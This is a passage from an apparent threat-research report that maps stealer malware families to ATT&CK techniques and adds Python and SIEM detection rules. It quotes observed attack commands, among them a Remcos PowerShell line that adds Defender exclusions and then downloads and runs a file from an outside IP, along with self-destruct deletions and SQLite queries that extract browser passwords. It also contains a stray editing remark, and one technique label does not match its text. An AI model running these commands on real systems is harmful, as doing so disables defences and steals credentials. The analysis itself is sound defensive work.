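    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'schtasks.exe /create /tn Backup /tr "C:\Program Files\Backup\backup.exe" /sc daily'},
]


def run_triage(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> findings, omitting events that produced none."""
    return {i: found for i, e in enumerate(events) if (found := triage(e))}


if __name__ == "__main__":
    for idx, found in run_triage(SAMPLE_EVENTS).items():
        print(idx, *found, sep="\n  ")
```

ProgramData is also used by legitimate installers, so the T1053.005 rule fires on some benign software; the parent process (here a Temp-dropped setup.exe) is the context to check before escalating. The two benign events at the end of the sample produce no findings, which is the behaviour to preserve when tuning the path list.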
Technique matrix, Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002): observed in two of the five families (Remcos, Vidar).

[Figure: Vidar Disabling UAC (source: triage)]

Similar behavior can be observed in the Vidar sample, which modifies the registry value associated with UAC and sets it to 0, effectively disabling UAC.

Sources:
https://app.any.run/tasks/099ae41d-866e-4d6b-b3f3-5ff8fe922bc7
https://tria.ge/230419-v17zfseb8y/behavioral3
https://gridinsoft.com/spyware/redline

Defense Evasion (TA0005)

Defense Evasion encompasses the techniques malware uses to avoid detection during a compromise, including uninstalling or disabling security software, and obfuscating or encrypting data and scripts.

Hide Artifacts: Hidden Files and Directories (T1564.001)

Malware often hides files and directories to evade detection mechanisms. Most operating systems include the concept of 'hidden' files, which are intentionally concealed from users when browsing the file system through a graphical user interface or using standard commands on the command line. This serves to prevent accidental modification of critical system files by regular users.

According to the report from Gridinsoft, before sending collected data to the command and control server, Vidar stealer saves it in a directory within the ProgramData folder. This hidden directory allows the malware to avoid detection during normal browsing. Within that directory, Vidar creates folders corresponding to the different categories of extracted data, named with a random sequence. Unsorted data and screenshots are placed directly in the root of the directory.
Technique matrix, Hide Artifacts: Hidden Files and Directories (T1564.001): observed in two of the five families (Redline Stealer, Vidar).

[Figure: Data collected by Vidar (source: gridinsoft)]

In a sample of Redline Stealer, upon execution it drops a file with the extension ".bat.exe". As soon as the file is dropped, it is made hidden using "attrib", a built-in Windows utility for displaying or modifying file and folder attributes, with the following command:

    attrib +s +h "C:\Users\admin\Desktop\filename.bat".exe

Sources:
https://app.any.run/tasks/099ae41d-866e-4d6b-b3f3-5ff8fe922bc7
https://tria.ge/230505-y8zjtsch97/behavioral1
https://gridinsoft.com/spyware/vidar

Hide Artifacts: Hidden Window (T1564.003)

Malware frequently leverages the PowerShell "-WindowStyle Hidden" parameter to conceal its activities from the user's view. This hides application activity that would otherwise be visible on screen. System administrators also use this technique to perform administrative tasks without disrupting users' work environments, and Windows scripting languages such as PowerShell, JScript, and Visual Basic all provide features for hiding windows.

In the sample analyzed from any.run, Agent Tesla uses a compiled HTML file (.chm) to hide its malicious code, which then invokes PowerShell with the "-WindowStyle hidden" parameter to download a second-stage payload using fileless techniques. This behavior can also be observed in Remcos, which leverages the "-WindowStyle hidden" parameter to conceal malicious activity from plain sight.

Technique matrix, Hide Artifacts: Hidden Window (T1564.003): observed in three of the five families (Redline Stealer, Remcos, AgentTesla).

[Figure: Redline Stealer Hidden Window]
[Figure: Agent Tesla Defender Exclusion (source: Vmray)]

Sources:
https://bazaar.abuse.ch/sample/3c53c9fabd1631125c5d295d22f5482ae226cf0bb34bc3de88e530b72347fc88/
https://app.any.run/tasks/803bc852-0431-41b2-8270-9c7635ed9cf6/
This behavior is discussed further in the techniques below.

Impair Defenses: Disable or Modify System Firewall (T1562.004)

Adversaries or malware may tamper with the system firewall configuration to evade defenses. This involves disabling or altering firewall settings, such as turning off the entire mechanism or modifying specific rules. These modifications can be made in various ways depending on the operating system, including from the command line, by modifying Windows Registry keys, or through the Windows Control Panel.
One behavior common to all the stealer malware families is use of the "Add-MpPreference" cmdlet to tamper with Windows Defender's configuration, excluding specific files, paths, or extensions from scanning. In the sample analyzed from Vmray, Agent Tesla adds the file path of its payload to Windows Defender's list of exclusions, so that Defender ignores the file when performing scans, allowing it to evade detection.

Technique matrix, Impair Defenses: Disable or Modify System Firewall (T1562.004): observed in all five families (Redline Stealer, Remcos, AgentTesla, FormBook, Vidar).

[Figure: FormBook Defender Exclusion (source: Vmray)]
[Figure: Vidar Defender Exclusion (source: any.run)]
[Figure: Redline Stealer Defender Exclusion (source: triage)]

Similar behavior was observed during the analysis of a FormBook sample. After execution, the malware drops payloads under the AppData directory and excludes these files from scans using the "Add-MpPreference" cmdlet. During our analysis of a Vidar sample on any.run, we observed the following commands, which add file extensions to Windows Defender's list of excluded file types, effectively instructing it to ignore any files with the ".dll", ".exe", or ".bat" extension during scans. Additionally, the sample adds the "C" directories to Windows Defender's exclusion list. In the Redline sample analyzed from triage, similar behavior was observed, except that instead of adding a specific file path, all directories were added to Windows Defender's list of exclusions.

Source:
https://www.vmray.com/analyses/95a4220eee2c/report/behavior_grouped.html
    "powershell.exe" Add-MpPreference -ExclusionExtension exe
    "powershell.exe" Add-MpPreference -ExclusionExtension dll
    "powershell.exe" Add-MpPreference -ExclusionExtension bat

Sources:
https://www.vmray.com/analyses/276d67bffae1/report/behavior_grouped.html
https://app.any.run/tasks/0dee7080-1586-450e-9dbe-b2c164e282d4/
https://tria.ge/230917-wzgasaef72/behavioral2

[Figure: Redline Stealer Disabling Defender (source: triage)]

In another Redline sample, Redline Stealer was found to disable real-time protection by modifying registry settings related to Windows Defender's real-time protection capabilities. The malware disables several aspects of Windows Defender's real-time monitoring, including behavior monitoring, on-access protection, and real-time scanning. It also creates a registry key for Windows Defender's real-time protection and configures values to disable specific features.

During our analysis of the Remcos sample on any.run, we observed the following command (shown in full under Indicator Removal below). It launches PowerShell in a hidden window and adds exclusions for both the Temp directory and ".exe" files to Windows Defender. Following a brief sleep, it retrieves an executable from a remote server and saves it to the Temp directory, then executes the downloaded file with cmd.exe.

In the observed sample, Redline Stealer also executed a command that forcefully terminates a process with taskkill using a specific process ID and then deletes a file from a specified location; this is covered under Indicator Removal: File Deletion below.
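The persistence and defense-evasion command lines described above share a few stable tokens: schtasks /create with a minute schedule or an action under Temp/ProgramData, Add-MpPreference with an -Exclusion* parameter, -WindowStyle hidden, attrib +h on an executable, and registry writes to EnableLUA or to Windows Defender's real-time protection settings. The following added example (not code from the Logpoint report) turns those into rule predicates run over constructed Sysmon-style events; the event contents, the rule labels, and the Defender "Real-Time Protection" policy value name are assumptions made for the example, since the report names the behaviour but not the value.

```python
import re
from typing import Optional

# Constructed Sysmon-style records (Event ID 1 = process create, 13 = registry
# value set) built for this example; they are not the report's sandbox output.
EVENTS = [
    {"event_id": 1, "command_line": r'schtasks.exe /create /tn "Puoi" /tr "C:\Users\user\AppData\Local\Temp\zqNDtAgMrV\binary.exe" /sc minute /mo 3 /F'},
    {"event_id": 1, "command_line": r'powershell.exe -WindowStyle hidden "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp; Add-MpPreference -ExclusionExtension exe"'},
    {"event_id": 1, "command_line": r'attrib +s +h "C:\Users\user\Desktop\filename.bat.exe"'},
    {"event_id": 1, "command_line": r'schtasks.exe /create /tn "Backup" /tr "C:\Program Files\Backup\backup.exe" /sc daily /st 02:00'},
    {"event_id": 1, "command_line": "powershell.exe -NoProfile Get-MpPreference"},
    {"event_id": 13, "target_object": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA", "details": "DWORD (0x00000000)"},
    # Assumed Defender policy value (not listed in the report) for real-time scanning.
    {"event_id": 13, "target_object": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring", "details": "DWORD (0x00000001)"},
    {"event_id": 13, "target_object": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA", "details": "DWORD (0x00000001)"},
]

# Directories the report's samples used for dropped payloads and task actions.
USER_WRITABLE = re.compile(
    r"\\(?:Users\\[^\\]+\\AppData|ProgramData|Users\\Public|Windows\\Temp|Windows\\Tasks)\\", re.I)


def scheduled_task_from_writable_path(cmd: str) -> bool:
    """schtasks /create on a minute schedule (the 3-minute Redline task, the
    Vidar task) or whose /tr action lives in a user-writable directory."""
    if not re.search(r"\bschtasks(?:\.exe)?\b.*?/create\b", cmd, re.I):
        return False
    action = re.search(r'/tr\s+"?([^"]+)', cmd, re.I)
    minute_schedule = re.search(r"/sc\s+minute\b", cmd, re.I)
    return bool(minute_schedule) or bool(action and USER_WRITABLE.search(action.group(1)))


def defender_exclusion_added(cmd: str) -> bool:
    """Add-MpPreference with any -Exclusion* parameter (path, extension, process)."""
    return bool(re.search(r"Add-MpPreference\b.*?-Exclusion(?:Path|Extension|Process)\b", cmd, re.I))


def hidden_powershell_window(cmd: str) -> bool:
    """powershell -WindowStyle hidden; powershell.exe also accepts abbreviations
    such as '-w hid', so the prefix is matched rather than the full spelling."""
    return bool(re.search(r"powershell.*?-w(?:indowstyle)?\s+h\w*", cmd, re.I))


def attrib_hides_executable(cmd: str) -> bool:
    """attrib +h applied to an executable or script (the Redline .bat.exe drop)."""
    return bool(re.search(r"\battrib(?:\.exe)?\b.*\+h\b.*\.(?:exe|bat|dll|vbs|js|ps1)\b", cmd, re.I))


def _dword(details: str) -> Optional[int]:
    """Parse Sysmon's 'DWORD (0x00000001)' (or a bare decimal) into an int."""
    match = re.search(r"0x([0-9a-fA-F]+)|^\s*(\d+)\s*$", details)
    if not match:
        return None
    return int(match.group(1), 16) if match.group(1) else int(match.group(2))


def registry_tamper(target: str, details: str) -> Optional[str]:
    """Registry writes that disable UAC (EnableLUA=0, the Remcos/Vidar change) or a
    Windows Defender real-time protection feature (Disable*=1, the Redline change)."""
    value = _dword(details)
    if re.search(r"\\Policies\\System\\EnableLUA$", target, re.I) and value == 0:
        return "UAC disabled via EnableLUA=0 (T1548.002)"
    if re.search(r"\\Windows Defender\\Real-Time Protection\\Disable\w+$", target, re.I) and value not in (None, 0):
        return "Defender real-time protection feature disabled (T1562)"
    return None


PROCESS_RULES = [
    ("Scheduled task from user-writable path or minute schedule (T1053)", scheduled_task_from_writable_path),
    ("Defender exclusion added via Add-MpPreference (T1562)", defender_exclusion_added),
    ("PowerShell hidden window (T1564.003)", hidden_powershell_window),
    ("attrib +h on executable (T1564.001)", attrib_hides_executable),
]


def triage(events):
    """Return (rule, evidence) pairs for every record that trips a rule; one
    command line can trip several rules, as the Remcos one-liner does."""
    hits = []
    for event in events:
        if event["event_id"] == 1:
            for name, predicate in PROCESS_RULES:
                if predicate(event["command_line"]):
                    hits.append((name, event["command_line"]))
        elif event["event_id"] == 13:
            verdict = registry_tamper(event["target_object"], event["details"])
            if verdict:
                hits.append((verdict, event["target_object"]))
    return hits


if __name__ == "__main__":
    for rule, evidence in triage(EVENTS):
        print(f"[{rule}] {evidence}")
```

Run against the constructed records, the benign daily task and the Get-MpPreference query produce no hits while the six stealer-like records do; the predicates are deliberately narrow and should be tuned against real baseline telemetry before use as alerts.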

Indicator Removal

Adversaries and malware frequently delete or modify artifacts on a system in an attempt to erase evidence of their presence and evade defenses.
Remcos command observed on any.run (referenced under Impair Defenses above):

    PowerShell.exe -WindowStyle hid "Add-MpPreference -ExclusionExtension "C:\Users\admin\AppData\Local\Temp"; "Add-MpPreference -ExclusionExtension ".exe"; Start-Sleep -Seconds 5;"Invoke-WebRequest 'hxxp://141[.]95[.]16[.]111:8080/RiotGames.exe' -OutFile 'C:\Users\admin\AppData\Local\Temp\RiotGames.exe'";cmd.exe /c C:\Users\admin\AppData\Local\Temp\RiotGames.exe

Indicator Removal: File Deletion (T1070.004)

One typical behavior observed in malware is the deletion of files left over from intrusion activity. Adversaries may download additional tools or other non-native files onto a system, leaving traces of the actions taken within a network. These files can be deleted during or after the intrusion to reduce the adversary's footprint.

Technique matrix, Indicator Removal: File Deletion (T1070.004): observed in two of the five families (Redline Stealer, Vidar).

Sources:
https://tria.ge/230917-wzgasaef72/behavioral2
https://bazaar.abuse.ch/sample/12d387fb81acf1c5b37b66b29ec7b38554d89223e395687a57096f891fca6977/
https://app.any.run/tasks/8cd984a4-a489-4817-a0a2-8600a00f4f76/
https://app.any.run/tasks/9b51956d-350f-480f-b144-f692aad1562f

According to a report from Gridinsoft, after collecting the data, Vidar stealer compresses it into a ZIP archive and sends it to a command and control server. The malware then initiates a self-destruct process by executing the following command. It first terminates a process and waits for 6 seconds, deletes a file, removes all ".dll" files in the "C:\ProgramData" directory, and then exits the command prompt, making it difficult to trace the events and understand the impact on the system because of the lack of evidence.
Redline Stealer taskkill and file deletion command:

    "cmd.exe" /C taskkill /F /PID 2148 && choice /C Y /N /D Y /T 3 & Del "C:\Users\admin\Desktop\Redline stealer 2022 Crack\Libraries\stubbackup.exe"

[Figure: Redline Stealer Taskkill (source: any.run)]

Vidar self-destruct command:

    "C:\Windows\System32\cmd.exe" /c taskkill /im Devil.exe /f & timeout /t 6 & del /f /q "C:\Users\MalWorkstation\Desktop\Malware.exe" & del C:\ProgramData\*.dll & exit

Sources:
https://gridinsoft.com/spyware/vidar
https://app.any.run/tasks/9b51956d-350f-480f-b144-f692aad1562f/

Masquerading

Malware often manipulates the properties of its artifacts to make them appear legitimate or harmless to both users and security tools. Masquerading involves manipulating or abusing an object's name or location, whether legitimately or maliciously, with the goal of evading detection and observation.

Masquerading: Match Legitimate Name or Location (T1036.005)

Malware may mimic the names or paths of legitimate files or processes when naming or placing its own. This deceptive technique is used to avoid detection and observation by security systems. For example, an adversary may place an executable in a commonly trusted directory, such as System32, or give it the name of a Windows process, such as svchost.exe.

Defense Evasion: Process Injection (T1055)

Stealer malware often employs process injection to bypass process-based defenses and potentially elevate privileges. Process injection involves executing arbitrary code within the memory space of a separate, live process. This gives the malware access to that process's memory and system/network resources and may allow it to gain elevated privileges.
In one observed sample, Redline Stealer masqueraded as "svchost.exe".

Technique matrix, Masquerading: Match Legitimate Name or Location (T1036.005): observed in one of the five families (Redline Stealer).

[Figure: Redline Stealer masquerading Svchost (source: any.run)]

Technique matrix, Defense Evasion: Process Injection (T1055): observed in all five families (Redline Stealer, Remcos, AgentTesla, FormBook, Vidar).

Source:
https://app.any.run/tasks/892c2cb5-c1a9-4b3b-bff0-3afbb6f7f5f7/

In the observed Redline Stealer sample, after masquerading as the legitimate Windows binary svchost.exe, the malware was seen spawning "C:\Windows\Microsoft.NET\Framework\{version}\CasPol.exe". This command-line tool in Microsoft's .NET Framework allows users and administrators to manage and modify security policies for .NET code. Once the CasPol process is launched, svchost injects into it, and the injected process then begins its suspicious activity.

According to the report from McAfee, in the observed Agent Tesla sample a VBS file executed PowerShell commands and then used steganography to perform process injection into RegAsm.exe. RegAsm.exe is a Windows command-line utility that registers .NET assemblies as COM components, facilitating interoperability between different software. However, malicious actors can also abuse it for purposes such as process injection, enabling covert or unauthorized operations.
The figure below illustrates the execution flow of Agent Tesla observed in the sample.

[Figure: Infection Chain Agent Tesla (Source: McAfee). Stages: VBS -> First PowerShell -> Second PowerShell -> Malware injected in RegAsm.exe; steganography: DLL hidden in image, encoded text file, final payload]

According to the report from Perception Point, Remcos has abused RegAsm for process hollowing. After the Remcos agent is unpacked from the gzip archive, the DLL initiates the process hollowing technique: it launches the legitimate RegAsm.exe process in a suspended state and injects the unpacked Remcos agent into it. The RegAsm.exe process then executes on the user's system with the injected Remcos embedded within it.

According to the report from Spixnet, Vidar's second-stage loader employs process injection to load the payload into memory. Specifically, it uses process hollowing to inject the Vidar binary into an AppLaunch.exe process.

According to the report from Vmray, Formbook has been observed using an "explorer.exe" process, initiated from a native Windows tool, to conceal itself. This involves injecting a section into explorer.exe through a combination of functions, including NtOpenProcess, NtCreateSection, and NtMapViewOfSection.

Sources:
https://www.logpoint.com/wp-content/uploads/2023/04/etpr-redline-stealer-malware-outbreak.pdf
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion/#:~:text=The%20infection%20process%20of%20Agent,avoid%20detection%20during%20static%20analysis.
https://perception-point.io/blog/behind-the-attack-remcos-rat/
https://www.spixnet.com/cybersecurity-blog/2023/01/05/analyzing-a-vidar-infostealer-sample
https://www.vmray.com/cyber-security-blog/formbook-september-2020-malware-analysis-spotlight/

Defense Evasion: Obfuscated Files or Information (T1027)

To evade detection and analysis, most malware obscures its payloads using encryption, encoding, or obfuscation. This behavior is prevalent across different platforms and networks. Malware often uses compression, archiving, or encryption to obfuscate its payloads, making detection and analysis challenging for defenders. This tactic is commonly observed across different types of malware, including stealer malware.

Credential Access (TA0006)

The Credential Access tactic covers techniques for stealing credentials such as usernames and passwords. With valid credentials, attackers can escalate privileges, move around a network, access restricted data, and carry out other malicious activities. Credential Access is one of the primary objectives of stealer malware.
[Figure: Process Overview of Formbook (source: Vmray)]
[Figure: Injection to explorer.exe (source: Vmray)]

Technique matrix, Defense Evasion: Obfuscated Files or Information (T1027): observed in all five families (Redline Stealer, Remcos, AgentTesla, FormBook, Vidar).

Source:
https://www.vmray.com/cyber-security-blog/formbook-september-2020-malware-analysis-spotlight/

Credentials from Password Stores: Credentials from Web Browsers (T1555.003)

Stealer malware often retrieves credentials from web browsers by accessing browser-specific files. These files commonly contain saved credentials such as website usernames and passwords, so that users can avoid manual entry in the future. While web browsers typically store credentials in encrypted form within a credential store, adversaries can employ methods to extract plaintext credentials from these browsers.

Stealer malware targets a wide range of browsers, and most stealer malware scans a pre-defined list of web browsers to search for and extract sensitive information. Redline Stealer queries the registry keys "SOFTWARE\WOW6432Node\Clients\StartMenuInternet" and "SOFTWARE\Clients\StartMenuInternet" to gather information about the browsers installed on the victim system. The stealer targets both Chromium-based browsers (such as Chrome and Opera) and Gecko-based browsers (such as Mozilla Firefox). It then receives commands to retrieve data from various browser files, such as saved passwords, saved credit cards, auto-fill content, and browser cookies, which are stored locally on the device.

Agent Tesla targets a specific set of browsers to extract login credentials, browser cookies, profiles, and ".sqlite" database files. In many browsers, sensitive data including passwords and browsing activity is stored in files within the browser's directory, and stealer malware attempts to access these files to extract credentials.
Technique matrix, Credentials from Password Stores: Credentials from Web Browsers (T1555.003): observed in all five families (Redline Stealer, Remcos, AgentTesla, FormBook, Vidar).

[Figure: Redline Stealer Network Stream (source: any.run)]
[Figure: Agent Tesla Search for Web Browser (source: malgamy.github)]

Sources:
https://any.run/report/2d9a9143fcb477dd37249f8d0f10ab0a7c5a509eecd5e69772ff8d319d75fcac/892c2cb5-c1a9-4b3b-bff0-3afbb6f7f5f7?_gl=1*1js1fuj*_gcl_au*MzczNDE0NTIxLjE3MDQ4NjU1ODE.*_ga*MTg4MzQyNzcwLjE2OTYxNjgyOTA.*_ga_53KB74YDZR*MTcwNzk3MTU0NS43NC4xLjE3MDc5NzMzMDkuMC4wLjA.
https://malgamy.github.io/malware-analysis/Deep-Analysis-Agent-Tesla/#browser-stealing-activities

Similar behavior can be observed in Vidar, Formbook, and Remcos, which generally enumerate the "C:\ProgramData" directory with the objective of collecting sensitive data from the target system, such as the list of installed software, cryptocurrency wallets, autofill files (containing saved form data), browser cookies, browsing history, and files of specific formats that may contain sensitive information or be of interest to the adversaries.

However, direct extraction of login credentials is not always possible in modern browsers because of encryption and other security measures. Therefore, most stealer malware targets the browsers' SQLite databases, which hold important information about the browser's operation on the system. Stealer malware has been known to access these database files in attempts to extract and decrypt passwords saved within the browser. For example:

The method of extracting information from cookie files varies with the browser. For browsers like IE and Microsoft Edge, which store cookies in a standard .txt file, malware can easily steal them by scanning the browser's directories. For browsers like Chrome and Firefox, which store cookies in SQL databases in less accessible locations such as the AppData/Roaming or /Local directory, extraction is more complex: the malware uses SQL queries tailored to each browser type to extract cookies, in the same way it retrieves login credentials as discussed above.
Sqlite query targeting Firefox:

    SELECT encryptedUsername, encrypt I changed this to:

    SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_login

Sqlite query targeting Chrome:

    SELECT origin_url, username_value, password_value FROM logins

Credential Access: Unsecured Credentials (T1552)

In addition to stealing browser data, stealer malware is capable of stealing credentials from multiple VPN services, FTP applications, and email clients such as Outlook and Thunderbird. Typically, it does so by searching for configuration files within user directories (T1552.001) or in the registry (T1552.002).

Technique matrix, Credential Access: Unsecured Credentials (T1552): observed in all five families (Redline Stealer, Remcos, AgentTesla, FormBook, Vidar).

[Figure: Agent Tesla searching for FTP utilities (source: malgamy.github)]

Source:
https://malgamy.github.io/malware-analysis/Deep-Analysis-Agent-Tesla/#email-stealing-activities

Credential Access: Steal Web Session Cookie (T1539)

Stealer malware commonly targets web application or service session cookies as well. There are numerous instances of malware specifically targeting cookies stored by web browsers on the local system.

Technique matrix, Credentials from Password Stores: Steal Web Session Cookie (T1539): observed in all five families (Redline Stealer, Remcos, AgentTesla, FormBook, Vidar).

Discovery

Discovery encompasses the techniques that malware employs to gather details about the target system. The goal is to obtain detailed information about systems, users, time, location, hosts, networks, system language, network shares, and other factors.
Stealer malware aims to gather crucial information about the target system, including details about users, installed software, the operating system version, the system default language, and so on. To achieve this, stealer malware employs various techniques, one common approach being to query the registry. By accessing registry keys and other system artifacts, the malware can extract valuable data to further its objectives. If specific conditions are not met, execution of the malware may be terminated: for instance, Redline Stealer verifies whether the victim is located in a CIS country and, if so, halts the attack. This behavior is prevalent across numerous stealer malware variants.

Collection

Collection refers to the techniques that malware uses to gather relevant information from various sources in order to achieve its goals, such as keylogging, which tracks and records every keystroke made on a computer. After collecting data, the next step is usually to exfiltrate it.
Collection: Archive Collected Data (T1560)

Malware may compress and encrypt collected data before exfiltration. By compressing the data, adversaries obscure its contents and reduce the volume transmitted over the network, making it less noticeable and potentially avoiding detection. Before exfiltrating collected data over SMTP, Agent Tesla archives it and then transmits it to a fake SMTP email server. Vidar stealer uses a similar method, packing the data into a ZIP archive before sending it to a command server.

Technique matrix, Collection: Archive Collected Data (T1560): observed in two of the five families (AgentTesla, Vidar).

Input Capture: Keylogging (T1056.001)

Most stealer malware employs keylogging to intercept user keystrokes, allowing adversaries to capture credentials as users type them. This tactic is commonly used to acquire credentials for accessing various accounts and systems. However, successfully capturing credentials may require adversaries to intercept keystrokes over an extended period to gather sufficient data.

Agent Tesla leverages the "SetWindowsHookEx" Windows API to install a hook procedure, enabling it to monitor low-level keyboard input events. The callback hook procedure "this.EiqpViCm9()" is executed whenever the victim types on their device. At regular intervals, Agent Tesla captures and logs the program title, time, and contents of the victim's keyboard input to a local file named "%Temp%/log.tmp".

Remcos includes a keylogging capability that creates a log file named "logs.dat" in the directory "C:\ProgramData\Terminal" to capture keystrokes and clipboard data. Formbook creates a dedicated folder within the "%AppData%" directory, where it stores stolen data in multiple record files with the ".ini" extension.
After process injection, FormBook persists within various target processes, continuously extracting victim data (user input and clipboard data) using inline-hooked APIs. It copies the data directly into a large shared memory section, which is then saved into the record files ("*.ini") within the AppData folder.

Technique matrix, Input Capture: Keylogging (T1056.001): observed in three of the five families (Remcos, AgentTesla, FormBook).

[Figure: Agent Tesla SetWindowsHookEx (source: fortinet)]
[Figure: Remcos Key file generation (source: cyfirma)]

Sources:
https://www.fortinet.com/blog/threat-research/agent-tesla-variant-spread-by-crafted-excel-document
https://www.cyfirma.com/outofband/the-persistent-danger-of-remcos-rat/

Collection: Screen Capture (T1113)

Stealer malware often attempts to capture screenshots of the desktop as part of Collection. It mostly uses the "Graphics.CopyFromScreen" .NET API to capture the desktop screen, gathering visual information from the victim's system. "Graphics.CopyFromScreen" is a method provided by the .NET Framework that captures the contents of the screen, or a specific region of it, as an image. It copies the pixels from the specified screen coordinates to a bitmap object, which can then be manipulated or saved.

Collection: Clipboard (T1115)

Stealer malware can collect data stored in the clipboard, capturing information copied by users. This is often accomplished through various methods, common techniques including the use of clip.exe or the "Get-Clipboard" cmdlet.
[Figure: Family Folder of FormBook (source: Fortinet)]
[Figure: Agent Tesla Capturing a Screen Shot via Graphics.CopyFromScreen (Source: Qualys)]
[Figure: Get-Clipboard]

Technique matrix, Collection: Screen Capture (T1113): observed in all five families (Redline Stealer, Remcos, AgentTesla, FormBook, Vidar).

Technique matrix, Collection: Clipboard Data (T1115): observed in all five families (Redline Stealer, Remcos, AgentTesla, FormBook, Vidar).

Sources:
https://www.fortinet.com/blog/threat-research/deep-analysis-formbook-new-variant-delivered-in-phishing-campaign-part-iii
https://blog.qualys.com/vulnerabilities-threat-research/2022/02/02/catching-the-rat-called-agent-tesla

Command and Control

Command and Control refers to the techniques adversaries use to communicate with systems under their control in a victim network. To avoid detection, adversaries frequently attempt to blend in with normal, expected traffic patterns.

Application Layer Protocol: Web Protocols (T1071.001)

Adversaries may use application layer protocols commonly associated with web traffic to evade detection or network filtering by blending in with existing traffic. Commands to the remote system, as well as the results of those commands, are often embedded within the protocol traffic exchanged between the client and server.

According to the report from Vmray, Agent Tesla can use a Tor proxy for its HTTP communication. If the relevant configuration is enabled, Agent Tesla first attempts to terminate all existing Tor instances before downloading and configuring the Tor client. Similarly, Formbook communicates with its command-and-control (C2) server over HTTP, primarily using GET and POST requests to send and receive data.
Technique matrix, Application Layer Protocol: Web Protocols (T1071.001): observed in all five families (Redline Stealer, Remcos, AgentTesla, FormBook, Vidar).

[Figure: Agent Tesla Command and Control (source: Vmray)]
[Figure: Formbook Command and Control (source: forescout)]

Sources:
https://www.vmray.com/cyber-security-blog/threat-bulletin-agent-tesla/
https://www.forescout.com/resources/formbook-infostealer/

Comparable behavior can be observed in Redline Stealer, Remcos, and Vidar, all of which communicate with their command-and-control servers over HTTP/HTTPS.

Command and Control: Non-Application Layer Protocol (T1095)

Adversaries may use OSI non-application layer protocols such as SOCKS, ICMP, or SOAP for communication between a host and the command and control server, or among infected hosts within a network. In many instances of Redline Stealer, stolen information is transmitted using SOAP. When communicating with the C2 server, the stealer creates a BasicHttpBinding object that uses HTTP as the transport for the SOAP messages. In most instances, Vidar establishes its command and control channel through pages on social networks such as Telegram, Mastodon, or even Steam: instead of embedding the IP address of the command and control server, the malware references a social network page whose name or description contains the C2 IP address.

Technique matrix, Non-Application Layer Protocol (T1095): observed in three of the five families; the text above describes Redline Stealer and Vidar.

[Figure: Redline Stealer (source: https://securityscorecard.com/)]
[Figure: Mastodon account used to route C2 connection (source: Gridinsoft)]

Sources:
https://securityscorecard.com/
https://gridinsoft.com/spyware/vidar

Exfiltration
Exfiltration Over Alternative Protocol

Adversaries may steal data by exfiltrating it over a protocol different from that of the existing command and control channel. Alternative protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not used as the main command and control channel.

Exfiltration over C2 Channel

Adversaries may exfiltrate stolen data through an existing command and control channel, encoding it within normal communications and using the same protocol as the command and control traffic. In the majority of observed scenarios, stealer malware exfiltrates collected data over the Command and Control (C2) channel.

Technique matrix, Exfiltration Over Alternative Protocol (T1048): observed in one of the five families (AgentTesla).

Agent Tesla has been observed using multiple methods to exfiltrate stolen sensitive data from compromised hosts. The exfiltrated data may be transmitted through FTP, SMTP, Telegram messaging, or HTTP command and control servers. Since November 2021, Agent Tesla samples have been observed sending emails to compromised or potentially fraudulent email accounts on mail servers managed by hosting providers. Since December 2021, Agent Tesla has adapted to using these compromised email accounts to send stolen data to Gmail addresses.
[Figure: Agent Tesla SMTP Exfiltration (source: SANS)]

Technique matrix, Exfiltration over C2 Channel: observed in all five families (Redline Stealer, Remcos, AgentTesla, FormBook, Vidar).

[Figure: AgentTesla email exfiltration (source: SANS). Through November 2021: a Windows host infected with AgentTesla connects to a mail server and sends email to an account on that server; emails with stolen data are stored on that server. Since December 2021: the infected host connects to a mail server and uses the account to send email to a Gmail address; emails with stolen data are stored at the Gmail account.]

Source:
https://isc.sans.edu/diary/Agent+Tesla+Updates+SMTP+Data+Exfiltration+Technique/28190

Detection and Response using Logpoint

In our analysis of multiple stealer malware families, we have uncovered several patterns of behavior that can serve as valuable indicators for detection.

Threat Hunting with Logpoint Converged SIEM

Given the similarity in behavior across multiple stealer malware families, analysts have significant opportunities to hunt for these threats. In this chapter, we explore how these common behaviors can enhance detection using the Logpoint Converged SIEM platform. By identifying and analyzing patterns of suspicious behavior commonly exhibited by stealer malware, we can build detection strategies on the premise that certain activities deviate from typical user actions and signal potentially abnormal behavior. This proactive approach enables us to stay ahead of emerging threats and mitigate risks effectively.

Required Log Sources

- Windows
  a. Process Creation with Command Line Auditing should be enabled
  b. Registry Auditing should be enabled
  c. File System Auditing should be enabled
  d. PowerShell Script Block Logging should be enabled
- Windows Sysmon
- Firewall
- IDS/IPS

Sources:
https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-creation
https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-registry
https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-file-system
https://success.trendmicro.com/dcx/s/solution/000291771?language=en_US&sfdcIFrameOrigin=null

Initial Access

Suspicious Child Process Spawned by Microsoft Office Product

Microsoft Office products have been widely abused as a means of delivering malicious payloads, frequently by embedding malicious content within seemingly legitimate documents or attachments. This technique relies on social engineering to trick users into opening these files, allowing infiltration of the target systems. We can use this alert to detect and monitor suspicious child processes created by Office applications.

    label="Process" label=Create
    parent_process IN ["*\WINWORD.EXE", "*\EXCEL.EXE", "*\POWERPNT.exe", "*\MSPUB.exe",
      "*\VISIO.exe", "*\OUTLOOK.EXE", "*\MSACCESS.EXE", "*\EQNEDT32.EXE", "*\Onenote.exe",
      "*\wordview.exe"]
    ("process" IN ["*\AppVLP.exe", "*\bash.exe", "*\bitsadmin.exe", "*\certoc.exe",
      "*\certutil.exe", "*\cmd.exe", "*\cmstp.exe", "*\control.exe", "*\cscript.exe",
      "*\curl.exe", "*\forfiles.exe", "*\hh.exe", "*\ieexec.exe", "*\installutil.exe",
      "*\javaw.exe", "*\mftrace.exe", "*\Microsoft.Workflow.Compiler.exe",
